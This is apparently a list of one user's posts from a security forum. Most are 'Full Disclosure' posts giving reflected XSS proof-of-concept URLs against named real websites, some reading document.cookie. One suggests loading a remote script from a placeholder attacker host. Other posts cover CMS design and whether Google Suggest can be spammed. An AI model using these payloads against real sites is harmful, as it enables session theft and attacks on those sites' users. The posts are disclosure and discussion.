I ran wget for a couple of hours, don't know if it has anything to do with that, I only used rsnake, not the rest.
Forum: Search Engine Hacking and SEO

welcome to google suggest :) Takes a while to update their lists ... There's rsnake rsnake xss rsnake xss cheat sheet ... Regards, Thomas
Forum: Search Engine Hacking and SEO

that's when they use the indices, if goog uses the search queries to suggest something and lots of people turn out to be looking for rsnake it may come up. Like: myspace worm + google query for rsnake on every page... Regards, T
Forum: Search Engine Hacking and SEO

Hi, somebody knows if it is possible to spam google suggestions ? Regards, Thomas
Forum: Search Engine Hacking and SEO

neuroo, if the input validation was always done like that, the number of sql inj/xss/file inc wouldn't be as high as it is now... then there's the use of xsl stylesheets which is a powerful way to add structure and eyecandy to basic (xml) data whereas now these things are commonly implemented in the same code as the fetching of the data. I don't know about every os cms but I've seen alot which 'ju
Forum: Projects

jungsonn, you have some code open sourced somewhere? I wasn't especially talking about security but more general software development: imo good software design mitigates the security risks: in a layered approach, input validation can be performed at the different levels and in an organised way, that's true for all software. Whenever i see something like $result=mysql_query($query); print '&l
Forum: Projects

Drupal is pretty nice but as all other cms's it's developed around a need for features and user functionality. From a software engineering point of view all cms's are just webpages on steroids. The idea I had when I was thinking about cms's was based on strict separation of different layers: there's -data -application logic -page structure -style now these parts can be implemented using -db
Forum: Projects

Hello, What content management systems do you like? Some time ago I started coding a pet cms but as the cms-o-sphere is crowded enough I quit it. Yet I'm still frustrated with the design and coding of most cms's. Is there a cms out there which does not suck? Is it worth the time coding yet another cms? Greets, Thomas
Forum: Projects

http://www.restorationhardware.com/rh/search/search_results.jsp?refineByValue=%3C/script%3E%3Cscript%3Ealert('b00')%3C/script%3EBath%3ABath+Hardware%3ATowel+Bars+%26+Tissue+Holders&link=refineby
Forum: Full Disclosure

https://www.adorama.com/catalog.tpl?op=process&func=Login&xemail=%3Cscript%3Ealert('hack3r%20safe!')%3C/script%3E
Forum: Full Disclosure

from fd thread : http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&
Forum: Full Disclosure

http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E& this one converts to uppercase, is there a XSS.JS up somewhere ? <SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS> should work...
Forum: Full Disclosure

that hackersafe is just the next lie in infosec. Providing that nice fuzzy false sense of security feeling. Makes good .biz i suppose. http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E google intext:"hacker safe" ;)
Forum: Full Disclosure

http://www.prodigy.msn.com/Salud/Tusalud/SaludMedicinas/default.asp?id_articulo=%22%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Forum: Full Disclosure

http://astrocenter.astrology.msn.com/msn/DeptChinWeek.aspx?When=1);alert(document.cookie&Af=-1000
Forum: Full Disclosure

lol "TEST and Demonstration site for Acunetix Web Vulnerability Scanner" tja :s
Forum: Full Disclosure

acunetix :p POST http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E
Forum: Full Disclosure

http://lifestyle.msn.com/HomeandGarden/BeJane/Article.aspx?cp-documentid=';alert(1);s='nn
Forum: Full Disclosure

I have a xss q: consider following html injection: http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style="background-image:url(javascript:alert(2))"> this results in <input type="text" value="" style="background-image:url(javascript:alert(2))"> why don't I get a pop-up on the msn site while the same tag does execute js in a clean ht
Forum: Full Disclosure

https://adcenter.microsoft.com/signup.aspx?adv_market=en-us%22;alert(1);s_account=%22&s_int=118
Forum: Full Disclosure

>btw, how long do companies like trustE,paypal need to fix their holes? paypal takes too long, last hole I reported took more than a week and several mails to get fixed. They don't have a 'standard' security@ mail-address, they don't monitor public mailing lists. In short, they suck at securing their customers. http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside <-- full
Forum: Full Disclosure

http://www.fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert(1)%3C/script%3E
Forum: Full Disclosure

I reported xss in myheadlines phpnuke module, yet it's still live on some places: http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474
Forum: Full Disclosure

I reported the phpnuke.org xss to them a while ago. Sad they haven't fixed since then. + I love the stock market xss: go figure someone spamming about stock xyz skyrocketting, putting xss'ed links to nasdaq etc. on it...profit! someone coding an xss scanner/fuzzer? I have some ideas on this subject.
Forum: Full Disclosure